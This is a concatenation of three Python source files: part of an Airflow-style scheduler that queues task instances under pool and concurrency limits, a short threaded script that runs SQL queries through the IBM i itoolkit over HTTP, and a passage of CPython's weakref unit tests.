tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
# Number of tasks that cannot be scheduled because of no open slot in pool
num_starving_tasks = 0
num_tasks_in_executor = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_starving_tasks = len(priority_sorted_task_instances) - current_index
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Not handling task %s as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
executable_tis.append(task_instance)
open_slots -= 1
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.models.taskinstance.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param simple_task_instances: TaskInstances to enqueue
:type simple_task_instances: list[SimpleTaskInstance]
:param simple_dag_bag: Should contains all of the task_instances' dags
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
TI = models.TaskInstance
# actually enqueue them
for simple_task_instance in simple_task_instances:
simple_dag = simple_dag_bag.get_dag(simple_task_instance.dag_id)
command = TI.generate_command(
simple_task_instance.dag_id,
simple_task_instance.task_id,
simple_task_instance.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=simple_task_instance.pool,
file_path=simple_dag.full_filepath,
pickle_id=simple_dag.pickle_id)
priority = simple_task_instance.priority_weight
queue = simple_task_instance.queue
self.log.info(
"Sending %s to executor with priority %s and queue %s",
simple_task_instance.key, priority, queue
)
self.executor.queue_command(
simple_task_instance,
command,
priority=priority,
queue=queue)
@provide_session
def _execute_task_instances(self,
simple_dag_bag,
states,
session=None):
"""
Attempts to execute TaskInstances that should be executed by the scheduler.
There are three steps:
1. Pick TIs by priority with the constraint that they are in the expected states
and that we do exceed max_active_runs or pool limits.
2. Change the state for the TIs above atomically.
3. Enqueue the TIs in the executor.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: Number of task instance with state changed.
"""
executable_tis = self._find_executable_task_instances(simple_dag_bag, states,
session=session)
def query(result, items):
simple_tis_with_state_changed = \
self._change_state_for_executable_task_instances(items,
states,
session=session)
self._enqueue_task_instances_with_queued_state(
simple_dag_bag,
simple_tis_with_state_changed)
session.commit()
return result + len(simple_tis_with_state_changed)
return helpers.reduce_in_chunks(query, executable_tis, 0, self.max_tis_per_query)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session):
"""
If there are tasks left over in the executor,
we set them back to SCHEDULED to avoid creating hanging tasks.
:param session: session for ORM operations
"""
if self.executor.queued_tasks:
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date,
# The TI.try_number will return raw try_number+1 since the
# ti is not running. And we need to -1 to match the DB record.
TI._try_number == try_number - 1,
TI.state == State.QUEUED)
for dag_id, task_id, execution_date, try_number
in self.executor.queued_tasks.keys()])
ti_query = (session.query(TI)
.filter(or_(*filter_for_ti_state_change)))
tis_to_set_to_scheduled = (ti_query
.with_for_update()
.all())
if len(tis_to_set_to_scheduled) == 0:
session.commit()
return
# set TIs to queued state
for task_instance in tis_to_set_to_scheduled:
task_instance.state = State.SCHEDULED
task_instance.queued_dttm = None
self.executor.queued_tasks.pop(task_instance.key)
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_scheduled])
session.commit()
self.log.info("Set the following tasks to scheduled state:\n\t%s", task_instance_str)
@provide_session
def _process_executor_events(self, simple_dag_bag, session=None):
"""
Respond to executor events.
"""
# TODO: this shares quite a lot of code with _manage_executor_state
TI = models.TaskInstance
for key, state in list(self.executor.get_event_buffer(simple_dag_bag.dag_ids)
.items()):
dag_id, task_id, execution_date, try_number = key
self.log.info(
"Executor reports execution of %s.%s execution_date=%s "
"exited with status %s for try_number %s",
dag_id, task_id, execution_date, state, try_number
)
if state == State.FAILED or state == State.SUCCESS:
qry = session.query(TI).filter(TI.dag_id == dag_id,
TI.task_id == task_id,
TI.execution_date == execution_date)
ti = qry.first()
if not ti:
self.log.warning("TaskInstance %s went missing from the database", ti)
continue
# TODO: should we fail RUNNING as well, as we do in Backfills?
if ti.try_number == try_number and ti.state == State.QUEUED:
msg = ("Executor reports task instance {} finished ({}) "
"although the task says its {}. Was the task "
"killed externally?".format(ti, state, ti.state))
Stats.incr('scheduler.tasks.killed_externally')
self.log.error(msg)
try:
simple_dag = simple_dag_bag.get_dag(dag_id)
dagbag = models.DagBag(simple_dag.full_filepath)
dag = dagbag.get_dag(dag_id)
ti.task = dag.get_task(task_id)
ti.handle_failure(msg)
except Exception:
self.log.error("Cannot load the dag bag to handle failure for %s"
". Setting task to FAILED without callbacks or "
"retries. Do you have enough resources?", ti)
ti.state = State.FAILED
session.merge(ti)
session.commit()
def _execute(self):
self.log.info("Starting the scheduler")
# DAGs can be pickled for easier remote execution by some executors
pickle_dags = False
if self.do_pickle and self.executor.__class__ not in (LocalExecutor, SequentialExecutor):
pickle_dags = True
self.log.info("Processing each file at most %s times", self.num_runs)
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self.subdir)
known_file_paths = list_py_file_paths(self.subdir)
self.log.info("There are %s files in %s", len(known_file_paths), self.subdir)
def processor_factory(file_path, zombies):
return DagFileProcessorProcess(
file_path=file_path,
pickle_dags=pickle_dags,
dag_id_white_list=self.dag_ids,
zombies=zombies
)
# When using sqlite, we do not use async_mode
# so the scheduler job and DAG parser don't access the DB at the same time.
async_mode = not self.using_sqlite
processor_timeout_seconds = conf.getint('core', 'dag_file_processor_timeout')
processor_timeout = timedelta(seconds=processor_timeout_seconds)
self.processor_agent = DagFileProcessorAgent(self.subdir,
known_file_paths,
self.num_runs,
processor_factory,
processor_timeout,
async_mode)
try:
self._execute_helper()
except Exception:
self.log.exception("Exception when executing execute_helper")
finally:
self.processor_agent.end()
self.log.info("Exited execute loop")
def _get_simple_dags(self):
return self.processor_agent.harvest_simple_dags()
def _execute_helper(self):
"""
The actual scheduler loop. The main steps in the loop are:
#. Harvest DAG parsing results through DagFileProcessorAgent
#. Find and queue executable tasks
#. Change task instance state in DB
#. Queue tasks in executor
#. Heartbeat executor
#. Execute queued tasks in executor asynchronously
#. Sync on the states of running tasks
Following is a graphic representation of these steps.
.. image:: ../docs/img/scheduler_loop.jpg
:rtype: None
"""
self.executor.start()
self.log.info("Resetting orphaned tasks for active dag runs")
self.reset_state_for_orphaned_tasks()
# Start after resetting orphaned tasks to avoid stressing out DB.
self.processor_agent.start()
execute_start_time = timezone.utcnow()
# Last time that self.heartbeat() was called.
last_self_heartbeat_time = timezone.utcnow()
is_unit_test = conf.getboolean('core', 'unit_test_mode')
# For the execute duration, parse and schedule DAGs
while True:
self.log.debug("Starting Loop...")
loop_start_time = time.time()
if self.using_sqlite:
self.processor_agent.heartbeat()
# For the sqlite case w/ 1 thread, wait until the processor
# is finished to avoid concurrent access to the DB.
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
self.processor_agent.wait_until_finished()
self.log.debug("Harvesting DAG parsing results")
simple_dags = self._get_simple_dags()
self.log.debug("Harvested {} SimpleDAGs".format(len(simple_dags)))
# Send tasks for execution if available
simple_dag_bag = SimpleDagBag(simple_dags)
if not self._validate_and_run_task_instances(simple_dag_bag=simple_dag_bag):
continue
# Heartbeat the scheduler periodically
time_since_last_heartbeat = (timezone.utcnow() -
last_self_heartbeat_time).total_seconds()
if time_since_last_heartbeat > self.heartrate:
self.log.debug("Heartbeating the scheduler")
self.heartbeat()
last_self_heartbeat_time = timezone.utcnow()
loop_end_time = time.time()
loop_duration = loop_end_time - loop_start_time
self.log.debug(
"Ran scheduling loop in %.2f seconds",
loop_duration)
if not is_unit_test:
self.log.debug("Sleeping for %.2f seconds", self._processor_poll_interval)
time.sleep(self._processor_poll_interval)
if self.processor_agent.done:
self.log.info("Exiting scheduler loop as all files"
" have been processed {} times".format(self.num_runs))
break
if loop_duration < 1 and not is_unit_test:
sleep_length = 1 - loop_duration
self.log.debug(
"Sleeping for {0:.2f} seconds to prevent excessive logging"
.format(sleep_length))
sleep(sleep_length)
# Stop any processors
self.processor_agent.terminate()
# Verify that all files were processed, and if so, deactivate DAGs that
# haven't been touched by the scheduler as they likely have been
# deleted.
if self.processor_agent.all_files_processed:
self.log.info(
"Deactivating DAGs that haven't been touched since %s",
execute_start_time.isoformat()
)
models.DAG.deactivate_stale_dags(execute_start_time)
self.executor.end()
settings.Session.remove()
def _validate_and_run_task_instances(self, simple_dag_bag):
if len(simple_dag_bag.simple_dags) > 0:
try:
self._process_and_execute_tasks(simple_dag_bag)
except Exception as e:
self.log.error("Error queuing tasks")
self.log.exception(e)
return False
# Call heartbeats
self.log.debug("Heartbeating the executor")
self.executor.heartbeat()
self._change_state_for_tasks_failed_to_execute()
# Process events from the executor
self._process_executor_events(simple_dag_bag)
return True
def _process_and_execute_tasks(self, simple_dag_bag):
# Handle cases where a DAG run state is set (perhaps manually) to
# a non-running state. Handle task instances that belong to
# DAG runs in those states
# If a task instance is up for retry but the corresponding DAG run
# isn't running, mark the task instance as FAILED so we don't try
# to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.UP_FOR_RETRY],
State.FAILED)
# If a task instance is scheduled or queued or up for reschedule,
# but the corresponding DAG run isn't running, set the state to
# NONE so we don't try to re-run it.
self._change_state_for_tis_without_dagrun(simple_dag_bag,
[State.QUEUED,
State.SCHEDULED,
State.UP_FOR_RESCHEDULE],
State.NONE)
self._execute_task_instances(simple_dag_bag,
(State.SCHEDULED,))
@provide_session
def heartbeat_callback(self, session=None):
Stats.incr('scheduler_heartbeat', 1, 1)
|
isql_rest_async.py
|
try:
import queue
except ImportError:
import Queue as queue
import threading
import urllib
from itoolkit.transport import HttpTransport
from itoolkit import *
class iDB2Async():
def __init__(self, isql):
self.itran = HttpTransport('http://yips.idevcloud.com/cgi-bin/xmlcgi.pgm','*NONE','*NONE')
self.itool = iToolKit()
self.itool.add(iSqlQuery('iqry', isql))
self.itool.add(iSqlFetch('ifch'))
self.itool.add(iSqlFree('ifre'))
def go(self):
self.itool.call(self.itran)
return self.itool.dict_out('ifch')
def get_url(q, icmd):
q.put(iDB2Async(icmd).go())
thedb2s = ["select CUSNUM from QIWS/QCUSTCDT where LSTNAM='Jones'",
"select CUSNUM from QIWS/QCUSTCDT where LSTNAM='Johnson'"]
q = queue.Queue()
for u in thedb2s:
t = threading.Thread(target=get_url, args = (q,u))
t.daemon = True
t.start()
# q.join()
for u in thedb2s:
s = q.get()
print(s)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
from test.support import gc_collect
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
ref3 = weakref.proxy(C())
gc_collect() # For PyPy or other GCs.
self.assertRaises(ReferenceError, bool, ref3)
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
gc_collect() # For PyPy or other GCs.
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_proxy_next(self):
arr = [4, 5, 6]
def iterator_func():
yield from arr
it = iterator_func()
class IteratesWeakly:
def __iter__(self):
return weakref.proxy(it)
weak_it = IteratesWeakly()
# Calls proxy.__next__
self.assertEqual(list(weak_it), [4, 5, 6])
def test_proxy_bad_next(self):
# bpo-44720: PyIter_Next() shouldn't be called if the reference
# isn't an iterator.
not_an_iterator = lambda: 0
class A:
def __iter__(self):
return weakref.proxy(not_an_iterator)
a = A()
with self.assertRaises(TypeError):
list(a)
def test_proxy_reversed(self):
class MyObj:
def __len__(self):
return 3
def __reversed__(self):
return iter('cba')
obj = MyObj()
self.assertEqual("".join(reversed(weakref.proxy(obj))), "cba")
def test_proxy_hash(self):
class MyObj:
def __hash__(self):
return 42
obj = MyObj()
with self.assertRaises(TypeError):
hash(weakref.proxy(obj))
class MyObj:
__hash__ = None
obj = MyObj()
with self.assertRaises(TypeError):
hash(weakref.proxy(obj))
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
gc_collect() # For PyPy or other GCs.
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
